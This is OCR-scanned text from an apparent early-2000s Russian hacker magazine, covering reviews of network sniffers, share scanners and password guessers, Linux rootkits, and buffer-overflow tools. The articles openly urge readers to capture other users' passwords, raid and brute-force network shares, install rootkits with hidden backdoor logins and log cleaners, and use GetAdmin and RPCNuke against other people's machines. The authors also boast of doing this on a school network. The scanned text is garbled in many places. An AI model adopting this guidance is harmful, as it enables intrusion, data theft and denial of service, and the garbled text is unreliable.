поэтому ты будешь видеть только 
свои собственные пакеты. Но 
сниффер не был бы снифеером, 
если бы у сетевой карты не было 
замечательной возможности пере- 
ходить в неразборчивый режим 
(promiscuous mode), в котором она 
принимает все пакеты подряд. 
Сниффер переводит сетевую карту 
в promiscuous mode, и ты можешь 
видеть все пакеты, идущие в твоей 
сетке, а следовательно, перехва- 
тить важные данные, например, 
почтовые сообщения, пароли от 
аськи и прочую полезную инфу. 

Давай рассмотрим, какие сниоф- 
феры есть для правильной оси. 


TCPDUMP 

http://www.tcpdump.org 
Пожалуй, первый сниффер для 
Linux. Есть в любом дистрибутиве, 
так что искать тебе его не придет- 
ся. Если же получилось, что у тебя 
по каким-то причинам он отсутству- 
ет, зайди на сайт и качни его исход- 
Ники. 

Простейший способ запуска - ко- 
манда "tcpdump" в командной стро- 
ке. Тсраитр начнет слушать актив- 
ный сетевой интерфейс. Явно ука- 
зать интерфейс можно опцией "-i" 
при запуске. Tcpdump показывает 
только заголовки пакетов, идущих 
в сети в форме: 


me 


== 
Lie | 07(32) 2003 


Tcpdump: жизнь сети как есть 


08:13:52.458097 217.24.177.165.ssh > 
217.24.177.161.950: P 182360:182700(340) ack 
29 win 17520 [tos 0x10] 

08:13:52.458315 217.24.177.161.950 > 
217.24.177.165.ssh: . ack 182700 win 17520 
(DF) [tos 0x10] 

08:13:52.490050 217.24.177.165.21037 > 
aldem.net.4090: . ack 14572 win 8760 (DF) 


Рассматривая заголовки пакетов 
через Tcpdump, ты сможешь изу- 
чить характер трафика твоей сетки 
в реальном времени. С помощью 
Tcpdump очень просто обнаружить 
попытки сканирования, ты сразу 
увидишь большое количество ле- 
вых пакетов, идущих на тебя. 

Tcpdump позволяет создавать 
выражения для приема пакетов 
только определенного вида. Прос- 
тейший пример: 


tcpdump tcp port 80 


Здесь параметр "tcp" указывает Ha 
то, что нужно ловить только ТСР па- 
кеты, опция "port 80" указывает, что 
нужно ловить пакеты, идущие (исхо- 
дящие) на порт 80 твоей тачки. О 
создании более сложных выражений 
отлично написано в man tcpdump. 


ats 


Tcpdump - это инструмент для ис- 
следования работы сети. Рекомен- 
дуется использовать в сочетании с 
умной книжкой по сетевым прото- 
колам. Не забывай, что для работы 
с сетевыми интерфейсами необхо- 
димы привилегии суперпользовате- 
ля, поэтому запускай снифорер с 
правами root. 

Помни, что без соответствующих 
знаний сетевых протоколов ты ни- 
когда не сможешь использовать 
все возможности даже простейше- 
го снифофера. 


SNIFFIT 
http://sniffit.rug.ac.be/~coder 
/sniffit/sniffit.html 


Интерактивный режим работы Sniffit. 
Просто и информативно 


Сниффер для правильной оси с хо- 
рошим набором функций. Есть во 
многих дистрибутивах, но в своей 
свалке я его не обнаружил :-). Если 
у тебя его нет, качай архив с сайта 
и инсталь. Пример запуска прог- 
раммы: 


sniffit -F ethO -P {ср -р 6667 


Сниффаем весь трафик IRC в сет- 
ке: опция "-F" задает устройство, 
которое нужно слушать, "-Р" - нуж- 
ный протокол, "-р" - нужный порт. 

Среди возможностей снифофера 
есть отлов паролей тай, http, ica, 
баз данных, возможность работы 
как с графическим интерфейсом в 
интерактивном режиме, основан- 
ном на ncurses (опция -1), так и без 
него, использование специальных 
конфигурационных файлов с пра- 
вилами фильтрации, работа с ррр и 


= poe 


Ethereal в работе 


DSNIFF 
http://www.monkey.org/~dug- 
song/dsniff/ 
Относительно простой cHucpqep. 
Задумывался как сниффер паро- 
лей и средство для отладки сетей. 
Поддерживает наиболее распрост- 
раненные протоколы ТСР: НТТР, 
POP, FTP, AIM, ICQ, SOCKS, SNMP, 
NFS и другие. Cam no себе Dsniff He 


Помни, что без соответствующих знаний 
сетевых протоколов ты никогда не 
сможешь использовать все возможности 
даже простейшего сниффера 


eth интерфейсами, а также воз- 
можность настройки для других ин- 
терфейсов. 

Sniffit - удобный, сбалансирован- 
ный по возможностям сниффер 
nog Linux. Многие люди использу- 
ют именно его и очень довольны. 


ETHEREAL 

http://www.ethereal.com 
Хороший сниффер с полностью 
графическим (gtk) интерфейсом 
(для кого-то это может быть мину- 
сом). Обладает всеми необходимы- 
ми функциями сниффера: поддер- 
живает множество протоколов, 
увидеть полный список которых 
можно в диалоге "Edit" > 
"Protocols...". Там же можно и отк- 
лючить все, что тебе не нужно. 
Есть возможность создавать весь- 
ма гибкие фильтры, чтобы прос- 
матривать только нужные тебе па- 
кеты. 

Порадовало, что ethereal, помимо 
eth интерфейса, поддерживает так- 
же ррри lo. 

В Ethereal есть хорошая возмож- 
ность, которая обозначается как 
"Follow ТСР STREAM". Она позво- 
лят объединить перехваченные 
пакеты и предоставить их в виде 
готового письма или html стра- 
НИчкКи. 

Ethereal - единственный из рас- 
сматриваемых прог сниффер с 
удобным графическим интерфей- 
сом и, пожалуй, наибольшим коли- 
чеством поддерживаемых протоко- 
лов. Он прост в освоении и исполь- 
зовании, к тому же присутствует 
подробный man. 


является полнофункциональным 
сниффером, но в составе дистри- 
бутива есть дополнительные сете- 
вые утилиты, которые призваны 
дополнять возможности програм- 
мы. Среди этих утилит arpspoof - 
перенаправление трафика с одного 
хоста на другой посредством лож- 
ных ARP-oTBeTOB, filesnarf - сниф- 
фер NFS, macof - МАС-спуфоринг, 
mailsnarf - снифеф почтовых сооб- 
щений, sshmitm - снифф SSH тра- 
фика (поддерживает только SSH 
первого протокола) и некоторые 
другие (тап страничка есть по 
каждой утилите). 

Архив весит всего 124 КБ, так что 
можешь скачать и попробовать. 
Инсталляция требует Berkeley DB, 
OpenSSL, libpcap, libnids, libnet, так 
что позаботься, чтобы они у тебя 
были (соответствующие сайты ука- 
заны в README). 

Dsniff - неплохое средство для 
определенных сетевых задач. 


ЕТТЕВСАР 

http://ettercap.sourceforge.net 
Отличный снифоер, работает как 
под управлением Линукс, так и 
многих других гих систем. Объеди- 
няет в себе как функции снифоре- 
ра, так и некоторого сетевого Cpeg- 
ства с набором полезных возмож- 
ностей. Имеет все базовые функ- 
ции снифофера, а также множество 
оригинальных, таких как задание 
различных режимов работы для на- 
именьшей вероятности обнаруже- 
ния в сети, поддержка плагинов и 
наличие собственного интерфейса 
для их разработки. 


Набор плагинов ЕНегсар. Неплохо, 
не правда ли? 


Среди плагинов (всего их 28) 
leech - полная изоляция заданного 
хоста, HOO_lurker - средство обна- 
ружения другого Ettercap в твоей 
сети, imp - определение имен net- 
bios, golem - DOS атака, shadow - 
простой SYN/TCP сканнер. Плаги- 
нов много, полный список и крат- 
кое описание можешь посмотреть, 
запустив еКегсар с опцией "-p list". 

В Ettercap есть очень удобная оп- 
ция "-С" - непосредственный сбор 
паролей и вывод полученной ин- 
формации в удобной форме: взаи- 
модействующие хосты, логин, па- 
роль. Опция "-f" позволяет onpege- 
лить удаленную ось с использова- 
нием отпечатков из базы птар. 
Есть возможность использования 
псевдографического (ncurses) ин- 
терфейса для более удобного ero 
юзанья. 

Простейший запуск осуществля- 
ется командой "ettercap" (запуска- 
ется интерактивный режим с гра- 
фическим интерфейсом). Перед To- 
бой появляется окно Ettercap со 
списком доступных компов в два 
столбца. Выбирай нужные тебе ag- 
реса простым щелчком по ним. 
Выбрав хосты, нужно задать 
действие для сниффера. Доступ- 
ные действия можно увидеть, на- 
Mas FI. 

Не понравилось то, что отсутству- 
ет поддержка других устройств, 
кроме eth. Ha ppp, конечно, сниф- 
дать нечего, кроме собственного 
трасфика, но мало ли что может по- 
надобиться, да и использование 
снифофера в учебных целях никто 
не запрещал. 

ЕКегсар, благодаря множеству 
плагинов и оригинальных возмож- 
ностей, наиболее мощное сетевое 
средство из представленных в об- 
зоре. 

Как видишь, выбрать есть из че- 
го, уверен, что половина из пере- 
численных средств уже есть в тво- 
ем дистрибутиве правильной оси. 
Тебе остается лишь освоить понра- 
вившийся сниффер, и ты сможешь 
многое. Надеюсь, что я помог тебе 
сделать первый шаг в правильную 
сторону :). 


АИ 
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Помни, твой 
лучший друг 
в поисках 
нужной 
информации 
- команда 
тап 


В Ettercap 
есть очень хо- 
рошая опция 
"-С" - непос- 
редственный 
сбор паролей и 
вывод полу- 
ченной инфор- 
мации в удоб- 
ной форме: 
взаимодей- 
ствующие 
хосты, логин, 


пароль 


раде СЕ 


yer 1950 


Обы 4hack 


ИНСТРУМЕНТЫ 
НА ШАРУ: 


ОБЗОР СКАНЕРОВ 


РАСШАРЕННЫХ РЕСУРСОВ ПОД ВЫНЬ 


„.ВОт@п АКА DOceNT:. 


Нуль-сессия - 
отличный спо- 
соб заглянуть 
на чужой диск, 
даже если он не 
расшарен 


Забыл пароль к 
шарам соседа по 
локалке? 
Xintruder, и 
музыка играет, 
а фильмы кру- 
тятся nonstop! 


Shares finder 
пока сильно 
проигрывает по 
возможностям 
LANScope, но 
это только бет- 
ка. Следи за 
релизом! 


раде 


share scanner 


Думаю, нет смысла пояснять тебе, что такое расшаренные ресурсы и зачем их искать. 


Про это уже много раз упоминалось в нашем журнале, и в этом номере ты также 
сможешь найти немало интересного по этой теме. 


амекну тебе только, 

что в любой сети всег- 

да найдется некоторое 
количество тачек, на которых есть 
либо общие папки, либо даже целые 
диски и принтеры, с помощью кото- 
рых юзеры обмениваются файлика- 
ми или просто по своей неграмотнос- 
ти открывают их для общего обозре- 
ния. А какие файлики можно найти 
на таких дисках - это уже отдельная 
песня! Про файлы паролей я про- 
молчу, думай сам, что ты можешь 
утащить с чужого диска и что тебе 
потом за это может быть, если кто-то 
пронюхает. Если твоя тачка не подк- 
лючена к какой-нибудь локалке и ты 
пользуешься скромным диал-апом, 
не переживай - сканирование твоего 
провайдера и других его пользова- 
телей тоже может принести непло- 
хие результаты, хотя и с большими 


гах, а составить список адресных 
пространств, да еще и сохранить его, 
а потом сканировать все эти сегмен- 
ты одним махом. Списков можно сос- 
тавить несколько, дав им понятные 
имена, а потом время от времени 
смотреть, не появилось ли что-ни- 
будь новое в выбранном адресном 
пространстве, а также не положили 
ли на уже найденные ранее ресурсы 
какие-нибудь новые файлики. Все 
найденное тобой, конечно же, сохра- 
няется. Прога обеспечивает очень 
удобную навигацию по спискам и 
найденным ресурсам. И при всем при 
этом прога очень шустрая! 
Найденный ресурс не обязательно 
подключать к твоей тачке, ты мо- 
жешь всего лишь кликнуть по нему 
и посмотреть, что на нем есть, а если 
он запаролен, то тут же тебе предло- 
жат ввести логин и пароль (как пос- 


LANScope - лучший сканер шаров с 
огромным количеством прог-примочек, 
позволяющих творить в сети все, что 
душе угодно 


тормозами. А пока что читай и выби- 
рай себе инструментарий... 399... чис- 
та в ознакомительных целях :). 


LANScope 
Качать: lanproject.boom.ru 
Размер: 948 Кб 
Распространяется: Freeware 


На мой взгляд - это лучшая прога в 
нашем обзоре. Это больше, чем 
просто сканер шар. Мало того, что 
со своей основной задачей прог- 
рамма справляется просто на ура, 
так она еще много чего умеет. Но 
обо всем по порячвку. 

LANScope - это творение русских 
программистов, к тому же еще и аб- 
солютно бесплатное. Если ты не ко- 
рифей в английском языке, то спешу 
тебя утешить - эта прога полностью 
на русском и с русскими хелпами. С 
нею ты сможешь сканировать не 
только каждый сегмент по отдель- 
ности, как во многих подобных про- 
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тупать с паролем, если ты его... XMM... 
"забыл", читай в этом же номере). 

К дополнительным функциям 
можно отнести то, что прога нахо- 
дит не только шары, но еще ftp и 
http серверы, установленные на 
любой из машин сканируемого 
пространства. И еще она показыва- 
ет все включенные в данный мо- 
мент компьютеры, а не только те, 
на которых что-то есть, впрочем, ты 
можешь потом отсеять их по задан- 
ному критерию. 

В дополнение к этой сосфте с того 
же сайта и от тех же разработчи- 
ков можно скачать еще несколько 
интересных бесплатных примочек, 
каждая из которых может работать 
как в составе с этой прогой, так и 
отдельно. Например, LANSend поз- 
волит отправить сообщение на уда- 
ленный компьютер, эмулируя стан- 
дартную команду net send. Доста- 
точно щелкнуть правой кнопкой 
крысы на любом из найденных 
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Сетевой монстр от Lanproject 


компьютеров, выбрать "Послать 
сообщение" и ввести его текст. На 
удаленном компе юзер увидит 
всплывающее окно с твоим текстом 
и кнопкой "Ок". Если тебе недоста- 
точно просто припугнуть юзера и 
ты решил учинить реальный дест- 
рой, тогда качай прогу 
LANShutdown - она позволяет уда- 
ленно отключить чужую тачку. Так 
же, как и LANSend, эту примочку 
можно юзать прямо из сканера 
LANScope. 

A чтобы защититься от подобных Be- 
щей, тебе поможет прога из той же се- 
рии под названием LANSafety, кото- 
рая позволяет скрыть свою тачку в 
сетевом окружении, защитит тебя от 
любителей команд "net use 
\\твоя_тачка\ cS", "net use \\твоя_тач- 
Ka\ admins" и прочих направленных 
на скрытые ресурсы команд, а также 
убережет и от нуль-сессии. 

В нагрузку рекомендую скачать и 
LANLoad, которая облегчает про- 


Старичок Легион 


Многообещающая бетка 


цесс скачивания файлов с расша- 
ренных ресурсов. Ее работа напо- 
минает GetRight или ReGet и позво- 
лит докачать файл в другой раз, 
если юзер, к которому ты "присо- 
сался", вдруг отключит комп и 
оборвет твое соединение с ним. 
Вот такой мощный джентльменский 
набор от lanproject, который ты полу- 
чаешь абсолютно халявно и без вся- 
ких рекламных баннеров и Nag- 
эсгееп'ов. Одним словом - must have! 


LEGION 
Качать: http 


Размер: 1.9 Мб 

Распространяется: Shareware 
Одна из самых простых и популяр- 
ных прог для поиска шар. В отличие 
от предыдущего комбайна, эта соф- 
тина, кроме сканирования общих ре- 


сурсов, ни для чего не пригодна. За- 
то свою работу она делает очень да- 


же неплохо и быстро. Причем ско- 
ростью сканирования можно управ- 
лять. Легион показывает все компь- 
ютеры с общими ресурсами и ничего 
лишнего. Чтобы подключить любой 
из найденных дисков и ознакомить- 
ся с его содержимым, достаточно 
щелкнуть на нем. Хотя прога и явля- 
ется шароварой, это не мешает ее 
полноценному использованию, хотя 
периодически при старте она будет 
напоминать о необходимости запла- 
тить. Впрочем, я думаю, ты знаешь, 
как это исправить. Бегом в аптеку :)! 


SHARES FINDER 
Качать: seguritylal 
Размер: 200 Кб 
Распространение: Freeware 


Прога почти такая же, как Legion. К 
сожалению, все навороты, которые 
позволили бы ей опередить по воз- 
можностям предыдущие проги, раз- 
работчик обещает только в финаль- 
ной версии, а это всего лишь бета. 
Среди них должны быть даже такие 
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Xsharez: еще больше инфы о шарах! 


возможности, как подбор пароля к 
запароленному ресурсу. А пока про- 
га умеет все то же самое, что и 
Legion, но в дополнение к этому мо- 
жет искать заданное имя файла как 
на одном общем ресурсе, так и на 
нескольких. Так же, как и у 
LANSope, есть возможность сохра- 
нить результаты сканирования. По 
скорости поиска прога все же здоро- 
во проигрывает предыдущим, хотя, 
по всей видимости, в финальной 
версии будет возможность переклю- 
чать скорость, как в Legion. 


XSharez 
Качать: http://fi 


Размер: 1 Мб. 
Распространяется: Freeware 


Тоже достаточно известный сканер, 
разработанный нашим программис- 
том. Он умеет не только искать об- 
щие ресурсы, но также подбирает к 
ним пароль. Эта прога из той же се- 
рии, что и подборщик пароля на 
шары - XIntruder, о котором ты мо- 
жешь прочитать в этом же номере. 
Но в XSharez есть сразу все, что 
нужно, - она может заменить и ска- 
Hep, и подборщик пароля. Из полез- 
ных функций можно выделить то, 
что прога показывает все включен- 
ные в данный момент компьютеры в 
сканируемом сегменте, да еще и со- 
общает тебе их МАС адреса, сете- 
вое имя, рабочую группу, а в неко- 
торых случаях даже ось. Я думаю, 
если ты и не нароешь шары, то, как 
минимум, найдешь применение по- 
лученным данным. В общем, эта 
программа - однозначно must see! 
В ЗАКЛЮЧЕНИИ... ПЛОХО 
Вот и все достойные сканеры, кото- 
рые попали в наше поле зрения 
при подготовке данного обзора. Ко- 
нечно же, есть и другие софтины, 
но они, как правило, мало чем отли- 
чаются друг от друга и от тех, что 
мы здесь тебе описали. Можешь 
попробовать каждый из них, они 
все по-своему хороши, и со всеми 
можно добиться нужных результа- 
тов. Главное, чтобы руки прямые 
были. В общем, пробуй. 

Да! При подготовке данного обзо- 
ра ни один юзер не пострадал... 
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Второе рождение самой популярной 
игры всех времен и народов 
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Почти все 
руткиты из 
первой и вто- 
рой групп, 
можно вычис- 
лить с по- 
мощью вся- 
ких руткит- 
файндеров. 
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РУТКИТЫ ПОД 
ПРАВИЛЬНУЮ ОСЬ 


ОБЗОР САМЫХ РАСПРОСТРАНЕННЫХ 
ROOTKIT'OB ПОД ЛИНУКС 


[ElviS] (elvis@sgroup.net) 


о хапнуть рута - это OG- 
но, а удержать root- 
shell - это совсем gpy- 

гое. Ведь нужно скрыть следы взлома 

от злобного админа и обеспечить се- 

бе быстрый и незаметный доступ к 

захваченной системе. Как же хакеры 

удерживают права суперпользовате- 
ля на взломанной тачке? Они юзают 
специальный сост! Что это за софт, 
какой он бывает, что умеет, какие 
плюсы и минусы имеет та или иная 
тулза, мы выясним в этом обзоре. 


РУТКИТЫ БЫВАЮТ РАЗНЫЕ... 
Есть несколько типов руткитов. Вот 
самые распространенные из них: 

1) руткиты, открывающие 
SSH/Telnet порт на машине с правами 
запустившего его пользователя, но 
при этом НЕ заменяющие системные 
программы типа Is, ps, netstat и т.д. на 
их протрояненные версии; 

2) аналогичные руткиты, но заменя- 
ющие стандартные сервисы на бэкдо- 
ры; 

3) руткиты, которые не открывает 
порт, пока владелец руткита не пош- 
лет специальный запрос на сервер, к 
примеру, ping -р ключ. 

Или еще один интересный вид рут- 
кита, который на данный момент реа- 
лизован hOrde team. Команды прини- 
маются на е-тай, который находится 
на хакнутом серваке :). Ответы отп- 
равляются на мыло владельца рутки- 
та. Если почтовый ящик закрывают, 
то руткит создает новый и извещает 
06 этом своего омпега. 

В этом обзоре я подробно рассмот- 
рел самые распространенные руткиты 


из первой и второй групп, а именно: 
ADORE, Tornkit, Synapsys, ГК, knark. 
Начнем по порядку. 


ADORE 

Существуют две реализации adore: 
nog Linux и nog FreeBSD. Текущая 
версия - 0.42 (adore-0.42.tar.gz) gna 
Линукса, и 0.34 (adorebsd-0.34.tar.gz) 
- для систем типа *BSD. При всех сво- 
их функциях архив с сорцами adore 
под Линух весит около 15 кб, а под 
*BSD всего 9 кб. Разработана данная 
тулза командой под названием TESO 
Security Group (http://team-teso.net). 
Agope создан Ha основе LKM руткита 
для ядра (Linux) v.2.[24]. 

Теперь я расскажу тебе о том, что 
этот руткит может. А может он пря- 
тать файлы и директории, в которых 
находится, - они остаются скрытыми 
даже после ребута, ныкать процессы 
в ps. Также adore патчит нетстат та- 
ким образом, чтобы тот не показы- 
вал, что открыт порт, на котором ви- 
сит данный руткит. Еще эта тулза 
поддерживает функцию "самоунич- 
тожения" (анинсталляции). В пакет 
ПО :) входит программа для контроля 
за работой руткита. А это весьма 
значительный плюс! 

Есть, конечно же, и недостатки. 
ADORE, впрочем, как и почти все рут- 
киты из первой и второй групп, мож- 
но вычислить с помощью всяких рут- 
кит-файндеров. Но, несмотря на это, в 
комплектике идет сфишка ava, которая 
затруднит удаление руткита из систе- 
мы. Еще один нюанс: если ты пове- 
сишь ADORE на 30-Й порт, то порты 
30*** тоже не будут видны в нетста- 
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те. Так что придумывай порт поориги- 
нальнее, к примеру, 7104-Й. 

Теперь поговорим об установке. 
Тулзу можно устанавливать двумя 
методами: поправить ручками 
Makefile либо заюзать удобный инс- 
талляционный скрипт. Первым делом 
тебе придется распаковать архив. Де- 
лается это так: tar -zxvf adore- 
0.42.tar.gz (вообще-то, раз ты пору- 
тил тачку, ты должен это знать :)). Но 
все же напомню. После того как ар- 
хив распаковался, заходи в папку с 
adore, затем: ./configure, make all. 3a- 
пускаемый файл - ./ava. Доступны 
следующие cpnaru: U - uninstall; и - по- 
казать cpamn, h - спрятать файл, г - 
выполнить как root, i - невидимый PID, 
\ - видимый PID, В - remoute (удален- 
ный) PID. Подробнее написано в 
README. 


TORNKIT 

Этот руткит, так же как и множество 
других, основан на LRK (Linux Root 
Kit) Бу JOhnny7. Текущая версия тул- 
зы 6.66. Руткит оптимизирован под 
linux/x86. Это первый руткит, исполь- 
зующий заранее откомпилированные 
трояны. Содержит подмены для боль- 
шого количества системных утилит, 
таких как: Is, login, ps, du, top, find, a 
также netstat. Обнаружить этот рут- 
кит весьма просто. Он оставляет мно- 
го следов: создает "скрытую" от глаз 
админа директорию /usr/src/.puta, но 
это вряд ли поможет, ведь достаточ- 
но выполнить Is -а ;). Еще есть одно 
палево: в системе поднимаются tel- 
netd и fingerd, даже если они были 
отключены (смотри, что Tornkit дела- 
етс inetd.conf). Также в минусы мож- 
но записать то, что торнкит поставля- 
ется в откомпилированном виде, а не 
в виде исходников, а это значит, что 


нельзя изменить такие параметры, 
как "home directory" /usr/src/.puta и 
T.g., что может свести Ha нет все уси- 
лия. По идее, это делалось для того, 
чтобы "облегчить" установку данного 
руткита в систему :). 

Tornkit работает через SSH и через 
login, в отличие от 70% руткитов, ра- 
ботающих только по протоколу 
Telnet. Способов залогиниться суще- 
ствует просто море! Во-первых, через 
ssh на заданный порт (по дефолту - 
47017); во-вторых, используя finger 
(если заюзать команду finger pass- 
word@tornkit.com, на порту 2555 отк- 
роется примитивный биндшелл, к ко- 
торому можно прителнетиться и нас- 
лаждаться прелестями хакнутой ма- 
шины); и в-третьих, можно просто за- 
юзать login ;). В "боекомплект" входят 
логклинер и сниффер. Качеством 
этих тулз я не очень доволен, если 
честно :). 

Теперь опишу подробнее некото- 
рые установочные настройки и тулзы 
Tornkit'a: 

Ле содержит в себе список тех 
файлов, которые будут скопированы 
в /usr/src/.puta; 

Лргос содержит список процессов, 
которые будут прятаться в PS; 

addr содержит список адресов, ко- 
торые не будут показываться в нетс- 
тат (к примеру, твой ip); 

1092 содержит список программ и 
хостов, по которым будут чиститься 
логи (не слишком тщательно, но бу- 
дут); 

tOrnsb - логклинер; 

tOrns - хреновенький CHUCpCpep; 

tOrnp - фильтр логов снифорера; 

Внимательно почитай ридми в архи- 
ве - там описано множество других 
сункций и опций ТорнКита. 

Неплохой руткит, если ставить его 
на короткий срок ;). 


SYNAPSYS 

Данный руткит поставляется одним 
большим исходником упарэуз.с, на- 
писанным под Линукс с ядром 2.2.х. 
Исходник надо переделывать под се- 
бя (вот это по-нашему!). Текущая 
версия 0.4. Coded by Berserker for 
Neural Collapse Crew (www.neural-col- 
lapse.org). Компилировать его надо с 
опцией -с чтобы получить модуль, 
который подключается к ядру коман- 
gon insmod. Синапсис основан на 
LKM (опять каша... ;)). Его легко от- 
ловить в /proc/modules, а также че- 
рез Ismod, как и другие руткиты, ус- 
танавливающиеся в систему в виде 
модуля к ядру. В сети валяется 
"патч", который заставляет лсмод не 


ЗОЕТ/РУТКИТЫ ПОД ПРАВИЛЬНУЮ ОСЬ 


LRK 


показывать синапсис в списке моду- 
лей. В самом рутките тоже есть та- 
кая фишшика - спрятать/показать 
LKM (Linux Kernel Module), но дове- 
рять ей я особо не стал бы. Настраи- 
вается синапсис во время работы с 
помощью команды Cat ;). Например, 
получив команду "cat trabozunin", 
синапсис удалит себя из системы, то 
бишь анинсталлится. 

Что же может данный руткит? А мо- 
жет он вот что: прячет процесс, атта- 
чит сигнал -32 (по дефолту) к коман- 
ge kill, TO есть, если выполнить КИ! -32 
pid, pid, который ты указал, спрячется 
:); также синапсис прячет себя в нетс- 
тате, ныкает пользователя в who/fin- 
ger/w, аеще он умеет выкидывать Ta- 
кой интересный сринт: если uid поль- 
зователя, к примеру, 1337, то он полу- 
чает привилегии рута :). В общем, 
неплохая штуковина. 

Приведу некоторые переменные 
программы для активации/деактива- 
ции функций: muid - права рута, hidf - 
скрытие процесса, ипт - загрузка мо- 
дуля, hidn - сокрытие ip, портов, gona- 
гов в нетстате, hidu - скрыть юзера, 
hidm - скрыть LKM (Linux Kernel 
Module). 


LINUX ROOT KIT AKA LRK 

Об этой магической тулзе я расска- 
жу поподробнее. Ведь именно на 
ней основывается большая часть 
"самодельных" руткитов. LRK напи- 
сан человеком, известным как Lord 
Somer. Этот зверский набор содер- 
жит в себе туеву хучу пробэкдо- 
ренных сервисов: chfn, chsh, 
crontab, du, find, ifconfig, inetd, kil- 
lall, linsniffer, login, Is, netstat, pass- 
wd, pidof, ps, rshd, syslogd, tcpd, top, 
sshd, su. В комплект также входят 
свои утилиты: bindshell, fix, linsnif- 
fer, thesniff, sniffchk, wted, 72. Теку- 
щая версия руткита 6.0. 

Теперь о том, что эта тулза конкрет- 
но умеет. А умеет она давать рута че- 
рез команды chfn, chsh, passwd, rshd, 
bindshell, login. Может прятать свои и 
другие файлы, процессы, порты, сое- 
динения. Утилита Ях меняет время и 


БмньнннБнБнкд 


системную дату файлов, с помощью 
-конфрига прячет conar PROMISC, ког- 
да юзаешь сниффер. Killall позволяет 
сделать процессы неубиваемыми, со- 
держит в себе неплохой сниффер. 
Если логинишься по ssh nog пользо- 
вателем, которого ты указал при кон- 
фигурации руткита (по дефолту 
rewt), то ничего не будет писаться в 
логи. Syslogd не ведет логи на опре- 
деленного пользователя, делает goc- 
туп с твоего хоста нелогируемым. 72 
ака Гаррег2 удаляет последние 
utmp/wtmp/lastlog. Также Linux Root 
Kit содержит много других полезных 
вещей, рекомендую тебе прочитать 
документацию (README из архива), 
там описано намного больше воз- 
можностей, которые могут сыграть 
важную роль в конкретном случае. 


ROOTKIT-SUNOS 
A теперь немного вкусностей. Мы no- 
говорим о рутките, который относит- 
ся к группе весьма дефицитных. Это 
руткит под SunOS и называется он 
rootkitSunOS.tgz, просто и понятно. 

Стоит заметить, что этот руткит чем- 
то похож на LRK ;). Rootkit-SunOS тро- 
янит login, netstat, ps, Is, du. Содержит 
в себе снифорер - es, логклинер, TOT 
же самый, что ив Irk - 72 (znipper2), a 
также fix, который меняет дату и вре- 
мя на "правильные". Может давать и 
не давать своим процессам suid пра- 
ва. Скрывает процессы, порты, фай- 
лы, соединения, пользователей. 
Правда, в скрытии процессов есть ко- 
сяк: тулза top показывает все процес- 
сы полюбэ ;(, и это не есть гут, HO ав- 
тор работает над патчем. 

Установка сводится, как всегда, к 
make all install. 


В общем, сам видишь, что в пра- 
вильной оси все довольно шоколад- 
но. Как говорится, чузь унд юзь. 


Загружаем LRK 
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Linux Root Kit 
содержит мно- 
го других по- 
лезных вещей, 
рекомендую 
тебе прочи- 
тать докумен- 
тацию 
(README из 
архива). 


Уречу 1950 
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ПЫШНЫЕ БУФЕРА 


САМЫЕ ПОСЛЕДНИЕ ЭКСПЛОИТЫ 
ПЕРЕПОЛНЕНИЯ БУФЕРА 


Vint(vint@townnet.ru) 


После получе- 
ния сего злост- 
ного послания 
телефон 
моментально 
вырубается 

с каким-то 
странным 
пуканьем 


А я вдруг стал 
админом и по- 
серфил Инета 
на халяву:). 
Рекомендую 
тебе сию coq- 
тину для пов- 
седневного ис- 
пользования на 
чужих компах 


раде 


Как ты знаешь, дарагой мой хуцкер, найти самому уязвимость переполнения буфера в 


серверном ПО, а тем более нашкодить плоит - дело далеко не пяти минут. Тебе же 
хочется здесь и сейчас, без презика и без последствий :) 


ки! Предлагаю провес- 

ти разбор полетов соф- 

тин и способов атаки, 
переполняющих буфер. В мой обзор 
угодили следующие фрукты: 
GetAdmin, нюкер RPCNuke и много 
HTML-koga для всеми любимого 
експлорера. 


ЗАГРЕБАЕМ ЖАР 

ЧУЖИМИ РУКАМИ 

Начнем с сосфтин. Представляю 
GetAdmin, программу, дающую в руки 
обычным юзерам системную консоль! 
Если ты спрашиваешь, на икс тебе 
консоль, да еще и системная, если у 
тебя есть СИЙ (графический интер- 
рейс), то ты смертный ламер... Знай 
же, о непросвещенный, что все 
действия по администрированию ОС 
производятся в консоли ручками, а 
не в експлорере крысой. Пока ты еще 
не сильно крут в делах консольных, 
запомни веселенькую команду смены 
пассворда у админа: net user adminis- 
trator. Из админской консоли тебе 
пришлось бы вводить старый пас- 
свора, которого ты, естественно, не 
знаешь, а из системной консольки те- 
бе пассворд админа-дурака не нужен! 
Вот чем системная консоль круче лю- 
бой другой. 

Переходим, собственно, к самой 
сосртине. Эта замутка по своему прин- 
ципу работы - типичный сплоит пере- 
полнения буфера: закидывает стек, 
вызывает системную консоль. Я с по- 
мощью этой софтины поимел халяв- 
ного Инета в своем родном уч. заве- 
дении. У всех он был отключен, кроме 
админа, а я вдруг сам стал админом и 
посерфил Инета на халяву :). Реко- 
менаую тебе сию тулзу для повсед- 
невного использования на чужих 
компах. Кстати, она работает и на 
ХРюшке, и на 2К. 

Следующим переполняльщиком бу- 
qpepa нам послужит нюкер, зовущий- 
ся RPCNuke версии 1.0. Кстати, напи- 
сан он нашими соотечественниками, 
правда, фейс у него английский. Из 
плюсов: массовое убийство целого 
диапазона айпишников и возмож- 
ность убийства в бесконечном цикле, 
что крайне необходимо при плохой 
связи или упрямстве тачки ламера :). 
Принцип работы все тот же - перепол- 
нение. Эта софтина может удаленно 
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убивать системы типа виндовс 2k или 
ХР, причем ХРень падает на ребут, а 
2000-k со вторым паком только 
ошибку изображает (жаль). Эту вещь 
все must have, однозначно! Утащить 
можно здесь: www.hitu.ussr.to, или 
здесь: www.immunitysec.com. 

К несчастью, это весь набор инте- 
ресных софтин по теме :(. Остальные 
проги, попавшие ко мне, либо не ра- 
ботают на ХРени, либо не показали 
должной эфорективности. 


РУЧКАМИ ЕЕ, РУЧКАМИ! 

А сейчас пора поработать ручками! 
Вот какие уязвимости на переполне- 
ние буфера ты сможешь реализовать 
сам, а при желании и накодить 
эксплоит. Сразу оговорюсь, я их тес- 
тил, и мне понравилось :)! 


БЕДНЫЙ, БЕДНЫЙ 1$! 
Уязвимость переполнения Oycpepa в 
IIS версии 4.6. Основа - дыра при ра- 
боте с протоколом Gopher. Нападение 
может быть начато через Web-cTpaHu- 
цу или сообщение мыльной почты, со- 
держащие HTML'ku, которые переад- 
ресует пользователя к хакерскому 
Gopher-cepBepy. Злостным серваком 
может быть простая софтина, которая 
должна уметь слушать и писать на 
ТСР порт. Для выполнения атаки уста- 
новка полного гофер-сервака не тре- 
буется. Хакер, юзая сей огрех, может 
сделать то, что обычным юзерам не- 
